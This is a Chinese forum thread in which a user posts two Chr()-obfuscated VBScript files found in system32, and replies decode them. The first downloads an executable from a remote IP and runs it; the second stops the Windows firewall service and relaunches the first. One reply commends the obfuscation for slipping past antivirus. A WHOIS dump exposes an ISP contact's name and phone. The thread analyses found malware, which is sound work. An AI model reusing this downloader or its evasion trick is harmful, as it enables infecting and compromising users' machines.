首页 诗词 字典 板报 句子 名言 友答 励志 学校 网站地图
当前位置: 首页 > 教程频道 > 开发语言 > VB >

电脑下抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看

2013-01-01 
电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看在system32文件夹下:文件1:run.vbs内容:s

电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
在system32文件夹下:
文件1:run.vbs
内容:

set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)

文件2: run2.vbs
内容:

set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)

由于不是直接含敏感代码,故而杀毒软件无视.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
[解决办法]
。。。路过,节分
[解决办法]
电脑下抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
[解决办法]

?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell

?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80)
Microsoft.XMLHTTP

?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
GET           http://218.11.0.167:8080/1.exe            0

?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109)
ADODB.Stream

?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oky.exe       2

?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
10000

?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
oky.exe

?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell

?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
net stop sharedaccess       0

?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)


%windir%\run.vbs            0


[解决办法]
run1.vbs

set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile oky.exe,2
wscript.sleep 10000
oshell.run oky.exe


run2.vbs

set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0

[解决办法]
Using 30+ day old  [STALE - being deleted now] cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).

% [whois.apnic.net node-2]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      218.11.0.0 - 218.12.255.255
netname:      UNICOM-HE
country:      CN
descr:        China Unicom Hebei province network
descr:        China Unicom
admin-c:      CH1302-AP
tech-c:       KL984-AP
status:       ALLOCATED PORTABLE
mnt-by:       APNIC-HM
mnt-lower:    MAINT-CNCGROUP-HE
mnt-routes:   MAINT-CNCGROUP-RR
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks:      This object can only be updated by APNIC hostmasters.
remarks:      To update this object, please contact APNIC
remarks:      hostmasters and include your organisation's account
remarks:      name in the subject line.
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed:      *****@cnc-noc.net 20031217
changed:      **********@apnic.net 20080314
changed:      **********@apnic.net 20090508
source:       APNIC

route:        218.11.0.0/16
descr:        CNC Group CHINA169 Hebei Province Network
country:      CN
origin:       AS4837
mnt-by:       MAINT-CNCGROUP-RR
changed:      *****@cnc-noc.net 20060118
source:       APNIC

person:       ChinaUnicom Hostmaster
nic-hdl:      CH1302-AP
e-mail:       *****@chinaunicom.cn
address:      No.21,Jin-Rong Street


address:      Beijing,100140
address:      P.R.China
phone:        +86-10-66259940
fax-no:       +86-10-66259764
country:      CN
changed:      *****@chinaunicom.cn 20090408
mnt-by:       MAINT-CNCGROUP
source:       APNIC

person:       Kong Lingfei
nic-hdl:      KL984-AP
e-mail:       *******@chinaunicom.cn
address:      45, Guang An Street, Shi Jiazhuang City, HeBei Province,050011,CN
phone:        +86-311-86681601
fax-no:       +86-311-86689210
country:      cn
changed:      *******@chinaunicom.cn 20090206
mnt-by:       MAINT-CNCGROUP-HE
source:       APNIC



[解决办法]
电脑下抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
[解决办法]
电脑下抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
[解决办法]
http://www.baidu.com/s?bs=%BF%D7%C1%EE%B7%C9&f=8&wd=0311-86681601&n=2&inputT=2110
[解决办法]
电脑下抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
好好学习脚本??

[解决办法]
疯狂的脚本。。。。。。。。。。。。。。。。。。。。。。。。。。
[解决办法]
楼主的杀毒不给力
我用Avast!打开这个页面就报警
复制楼主的内容,保存到文件也被干掉
[解决办法]
我电脑用的微软的杀毒软件,保存哪段代码,也是有提示的!
[解决办法]
顶起来看看,找得到不? 

[解决办法]
MSE在保存上面这段代码时也提示有毒。。。
[解决办法]
这样写可以过360,赞一个,学习了。
[解决办法]
路过看看
[解决办法]
高手总是有的,
[解决办法]
nod32第一段扫出来了,第二段没反应
[解决办法]
看看热闹……

热点排行